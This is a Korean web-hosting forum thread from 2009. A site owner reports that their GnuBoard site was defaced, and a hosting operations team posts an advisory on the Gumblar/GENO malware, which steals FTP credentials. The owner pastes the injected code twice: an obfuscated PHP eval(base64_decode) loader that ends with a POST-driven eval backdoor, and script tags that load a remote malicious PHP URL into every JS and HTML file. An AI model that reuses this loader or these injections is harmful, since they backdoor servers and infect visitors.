그누보드에 올라온 해킹관련 내용 페이지가 변조 되었네요.
최고관리자
본문
index.php ,config.php,dbconfig.php 파일 상단에
<?php eval(base64_decode('aWYoIWlzc2V0KCR2b3M4MSkpe2Z1bmN0aW9uIHZvczgoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyOXRiMk5vWVdOb1lTNWpiMjB2YVcxaFoyVnpMM0poYm1zMUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB2b3M4MigkYSwkYiwkYywkZCl7Z2xvYmFsICR2b3M4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkdm9zODEpKWNhbGxfdXNlcl9mdW5jKCR2b3M4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2b3M4JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3ZvczgnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdm9zOGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3ZvczgyJykpIT0ndm9zODInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
그리고 모든 js파일 하단에
document.write('<script src=http://omochacha.com/images/rank5.php ><\/script>');
그리고 모든 HTML 파일엔
<script src=http://omochacha.com/images/rank5.php ></script>
내용이 들어가 있는데요.
제 사이트만 이러는 건가요?
마땅히 검색어를 뭘로 해야할지도 모르겠네요.
위 문제를 해결할 방법이 있을까요?
그누 버전에 상관없이 저러는거 같은데요.
iframe 이용한 악성코드 삽입, 홈페이지 변조 사고 대비 대응책
<?php eval(base64_decode('aWYoIWlzc2V0KCR2b3M4MSkpe2Z1bmN0aW9uIHZvczgoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyOXRiMk5vWVdOb1lTNWpiMjB2YVcxaFoyVnpMM0poYm1zMUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiB2b3M4MigkYSwkYiwkYywkZCl7Z2xvYmFsICR2b3M4MTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkdm9zODEpKWNhbGxfdXNlcl9mdW5jKCR2b3M4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2b3M4JylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3ZvczgnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdm9zOGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3ZvczgyJykpIT0ndm9zODInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
그리고 모든 js파일 하단에
document.write('<script src=http://omochacha.com/images/rank5.php ><\/script>');
그리고 모든 HTML 파일엔
<script src=http://omochacha.com/images/rank5.php ></script>
내용이 들어가 있는데요.
제 사이트만 이러는 건가요?
마땅히 검색어를 뭘로 해야할지도 모르겠네요.
위 문제를 해결할 방법이 있을까요?
그누 버전에 상관없이 저러는거 같은데요.
iframe 이용한 악성코드 삽입, 홈페이지 변조 사고 대비 대응책
닉네임 : 센터운영팀 (220.♡.215.4)
조회 : 125 
iframe악성코드_증상및대응책.txt (3.2K) [59] DATE : 2009-10-09 16:58:50
안녕하세요. (주)스마일서브 SMILE 2센터 센터운영팀입니다.
최근 들어 iframe 을 이용, 악성코코 삽입에 의한 홈페이지 변조 사고가 빈번히 발생하고 있습니다.
이는 감염된 바이러스에 의해 클라이언트 PC 에 저장되어 있던 FTP 정보가
외부로 유출되어 발생하는 것으로, 이에 따른 피해가 발생하고 있으니 대비하시기 바랍니다.
검블러(Gumblar) 또는 GENO 라고 불리는 악성코드는 어도브(Adobe)사의 Acrobat 이나 Flash Player 의
보안패치가 되지 않은 PC 가 특정 Web Site 를 방문하여 감염되는 'Drive by Download' 방식으로 전파되고
있어 그 감염속도가 매우 빠릅니다.
또한 감염된 PC 이용자가 Web Site 의 파일을 관리하는 FTP 클라이언트 프로그램을 가지고 있을 경우
ID 와 Password 를 빼내어 해당 Web Site 의 index, main 등의 이름을 가진 html, php 파일들을
변조해서 악성코드를 다운받도록 코드를 심어놓게 됩니다.
증상 및 대응책은 첨부파일을 참조하시기 바랍니다.
감사합니다.
====================================================================
서버를 안전하게 보호하는 일은 지속적인 관심과 관리입니다.
====================================================================
관련링크
댓글목록
등록된 댓글이 없습니다.